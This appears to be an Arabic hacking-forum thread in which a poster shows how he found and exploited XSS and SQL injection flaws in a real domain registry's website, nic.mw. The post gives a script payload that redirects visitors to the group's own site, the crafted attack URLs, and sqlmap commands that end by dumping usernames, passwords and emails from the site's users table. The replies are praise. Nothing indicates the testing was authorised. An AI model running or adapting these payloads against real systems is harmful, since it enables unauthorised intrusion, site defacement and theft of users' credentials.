1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ شرح ] اكتشاف ثغرات الموزع وكيف يتم استغلالها dns

الموضوع في 'آمن المواقع والسيرفرات' بواسطة خأإآلد, بتاريخ ‏9 مايو 2014.

كاتب الموضوع : خأإآلد المشاهدات : 993 الردود : 19 ‏9 مايو 2014
  1. غير متصل

    خأإآلد
    DeveloPer Plus

    عضو منذ:
    ‏18 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    الإقامة:

    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله وبركاته

    اليوم اعود لكم بشرح اكتشاف ثغرات الموزع وكيف يتم استغلالها بشكل مفصل لكي تتم

    الفايده من الموضوع بصراحه صاحب الفكره المبدع برستيج جزاه الله خير الجزاء

    حبيت اوضح الفكره في الشبكه لتعم الفائده بشكل اكثر

    معنا هذا الموزع تحت المجهر

    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]


    قلت خلني اتفحصه واشوف شنو فيه والحمدالله اكتشفت فيه ثغرتين

    sql & xss

    طيب نضع لمسات مصوره *:"

    [​IMG]

    نشوف الأن كيف تم اكتشاف الثغره xss

    نشوف محرك البحث

    ونجرب هذا الكود

    كود PHP:
    <<SCRIPT>alert("hacked by IQ-TeaM ");//<</SCRIPT>
    [​IMG]

    النتيجه ُ;)ًٌُ

    [​IMG]

    طلع فيه اصابه الحين نشوف نزرع كود التحويل

    نجرب الكود

    كود PHP:
    '<script>location.replace("http://www.iq-team.org");</script>'
    [​IMG]

    نشوف المسار والتحويل

    كود PHP:
    http://www.nic.mw/index.php?d=0&domain=%27%3Cscript%3Elocation.replace%28%22http%3A%2F%2Fwww.iq-team.org%22%29%3B%3C%2Fscript%3E%27&Submit=Search
    النتيجه

    [​IMG]

    تمام تم التحويل

    نتقل الان الى الثغره الثانيه الي هي sql

    نشوف كيف تم اكنتشافها

    كود PHP:
    http://www.nic.mw/index.php?d=0&domain=1'%20AND%201=3%20'
    [​IMG]

    احتمال اصابته بنوع بلند سكويل قلنا خلنا نشوف sqlmap

    نشوف الامر

    كود PHP:
    python sqlmap.py -"http://www.nic.mw/index.php?d=0&domain=1" --dbs
    وكانت النتيجه زي ما توقعت انه مصاب

    نشوف الناتج

    [​IMG]

    نكمل الحين باقي الاوامر

    كود PHP:
    python sqlmap.py -"http://www.nic.mw/index.php?d=0&domain=1" -D tarsus --tables
    [​IMG]

    اوكي تمام نشوف الحين جدول users

    نستخدم هذا الامر

    كود PHP:
    python sqlmap.py -"http://www.nic.mw/index.php?d=0&domain=1" -D tarsus -T users --columns
    النتيجة

    [​IMG]

    نستخرج الحين البينات النهائيه

    نستخدم الامر

    كود PHP:
    python sqlmap.py -"http://www.nic.mw/index.php?d=0&domain=1" -D tarsus -T users -C user_id,password,email --dump
    ونشوف النتيجه

    [​IMG]

    تم استخراج البينات من القاعده

    والسلام خير الختام والسلام علكيم ورحمة الله وبركاته
     


    1 person likes this.
    جاري تحميل الصفحة...
  2. غير متصل

    Tej HAcKEr
    DeveloPer Plus

    عضو منذ:
    ‏15 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    الوظيفة:
    hacker
    الإقامة:

    رد: اكتشاف ثغرات الموزع وكيف يتم استغلالها dns

    صراحا انتا مبدع وموضوعك رائع جدأأ شكرأأ لمجهودك راقي والمميز
     


  3. غير متصل

    Yousef <link href="http://www.iq-team.org/vb/ghost/ghost.
    DeveloPer Plus

    عضو منذ:
    ‏1 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:

    رد: اكتشاف ثغرات الموزع وكيف يتم استغلالها dns

    وعليكم السلام

    يعطيك الف عافية يا غالى

    بتوفيق يا غالى ً#ٌ5oًًًُ.
     


  4. غير متصل

    خأإآلد
    DeveloPer Plus

    عضو منذ:
    ‏18 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    الإقامة:

    رد: اكتشاف ثغرات الموزع وكيف يتم استغلالها dns

    تسلموا شباب على المرور الرائع
     


  5. غير متصل

    KaBriMO
    rank
    Developer

    عضو منذ:
    ‏14 يوليو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: اكتشاف ثغرات الموزع وكيف يتم استغلالها dns

    [font="ae_almothnna"]مشكوور على الشرح ..![/font]
     


  6. غير متصل

    Hell_Hac
    rank
    Developer

    عضو منذ:
    ‏16 يونيو 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    الإقامة:

    رد: اكتشاف ثغرات الموزع وكيف يتم استغلالها dns

    جميل جدا مشاء الله عليك اخي الكريم

    بارك الله فيك
     


  7. غير متصل

    صــــاروخ
    rank
    Developer

    عضو منذ:
    ‏3 ديسمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:

    رد: اكتشاف ثغرات الموزع وكيف يتم استغلالها dns

    شرح أكثر من رائع و موضوع منسق بشكل أروع

    مشكور حبيبي الغالي

    يوشم بالخماسي + التقييم لشخصك الكريم

    تحياتي حبيبي
     


  8. غير متصل

    •● ṔriNḉẻ ●•
    DeveloPer Plus

    عضو منذ:
    ‏5 يناير 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    8
    نقاط الجائزة:
    الإقامة:

    رد: اكتشاف ثغرات الموزع وكيف يتم استغلالها dns

    وعليكم السلام ورحمة الله و بركاته

    بارك الله فيك أخي شرح رائع

    واصل ابداعك ولا تحرمنا من جديدك يالغالي​
     


  9. غير متصل

    Al-JoKeR
    ExpErt DeveloPer

    عضو منذ:
    ‏22 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:
    الوظيفة:
    طالب علم
    الإقامة:

    رد: اكتشاف ثغرات الموزع وكيف يتم استغلالها dns

    جزاك الله كل خير أخي
    إبداع وتألق دائمين​
     


  10. غير متصل

    TIGERs HAKER
    Active DeveloPer

    عضو منذ:
    ‏2 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:

    رد: اكتشاف ثغرات الموزع وكيف يتم استغلالها dns

    بسمَ آللهِ مـآ شآءِ آللهُِ ،،
    شرٍح مبسطُ وبطرٍيقهِ روٍوٍعهِ ..
    آللهِ يعطُيكَ آلعآفيهُِ .. {ً#ٌ5oًًًُ. }
     


مشاركة هذه الصفحة

جاري تحميل الصفحة...